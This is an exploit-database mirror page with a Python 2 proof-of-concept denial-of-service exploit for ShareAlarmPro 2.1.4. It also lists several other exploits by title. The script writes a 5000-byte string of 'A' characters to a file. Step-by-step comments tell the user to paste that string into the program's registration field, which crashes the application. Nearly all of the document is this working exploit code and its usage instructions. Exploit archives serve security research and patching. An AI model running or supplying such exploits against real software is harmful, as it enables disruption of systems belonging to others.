exploit-db-mirror/exploits/windows_x86/dos/46063.py
Offensive Security a6aa1db161 DB: 2018-12-28
10 changes to exploits/shellcodes

Product Key Explorer 4.0.9 - Denial of Service (PoC)
NetShareWatcher 1.5.8 - Denial of Service (PoC)
ShareAlarmPro 2.1.4 - Denial of Service (PoC)
MAGIX Music Editor 3.1 - Buffer Overflow (SEH)
Terminal Services Manager 3.1 - Local Buffer Overflow (SEH)
Iperius Backup 5.8.1 - Buffer Overflow (SEH)
Craft CMS 3.0.25 - Cross-Site Scripting
WordPress Plugin Audio Record 1.0 - Arbitrary File Upload
bludit Pages Editor 3.0.0 - Arbitrary File Upload
WordPress Plugin Baggage Freight Shipping Australia 0.1.0 - Arbitrary File Upload
2018-12-28 05:01:43 +00:00

29 lines
No EOL
871 B
Python
Executable file

# Exploit Title:ShareAlarmPro 2.1.4 - Denial of Service (PoC)
# Date: 2018-12-25
# Exploit Author: T3jv1l
# Vendor Homepage: :http://www.nsauditor.com
# Software: http://sharealarm.nsauditor.com/downloads/sharealarmpro_setup.exe
# Contact: https://twitter.com/T3jv1l
# Version:ShareAlarmPro 2.1.4
# Tested on: Windows 7 SP1 x86
# PoC:
# 1. Download and install the setup file
# 2. A file "PoC.txt" will be created
# 3. Click Help > Register... in tool bar
# 4. Copy the contents of the file (PoV.txt) and paste in the Registration Key/Name field
# 5. Click OK and BOOMMMM !!!!
#!/usr/bin/python
buffer = "\x41" * 5000
payload = buffer
try:
f=open("PoC.txt","w")
print "[+] Creating %s bytes payload..." %len(payload)
f.write(payload)
f.close()
print "[+] File created!"
except:
print "File cannot be created"